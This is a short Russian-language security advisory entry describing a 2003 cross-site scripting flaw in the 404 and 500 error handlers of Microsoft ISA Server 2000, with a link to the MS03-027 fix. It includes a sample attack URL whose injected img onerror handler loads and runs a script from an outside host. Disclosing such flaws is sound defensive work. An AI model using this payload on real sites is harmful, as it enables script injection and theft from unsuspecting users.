Межсайтовый скриптинг в Microsoft Internet Security and Acceleration (ISA) Server.
| Дата публикации: | 17.07.2003 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1037 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость в проверке правильности входных данных обнаружена в Microsoft Internet Security and Acceleration (ISA) Server. Удаленный пользователь может выполнить XSS нападение.
Уязвимость обнаружена в обработчике 404 и 500 ошибки в Microsoft Internet Security and Acceleration (ISA) Server. Удаленный пользователь может сконструировать специально обработанный URL, содержащий произвольный HTML код, который будет выполнен в браузере пользователя, просматривающего эту ссылку, в контексте уязвимого сайта. Пример: http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f% 5Cx2f jscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0Этот пример включит и выполнит http://jscript.dk/test.js на YOUR.TLD, при условии, что YOUR.TLD защищен ISA Server. Уязвимость обнаружена в Microsoft Internet Security and Acceleration (ISA) Server 2000 Для устранения уязвимости, установите обновленную заплату, которую можно скачать отсюда: http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-027.asp |
| Ссылки: | Thor Larholm security advisory TL#006 |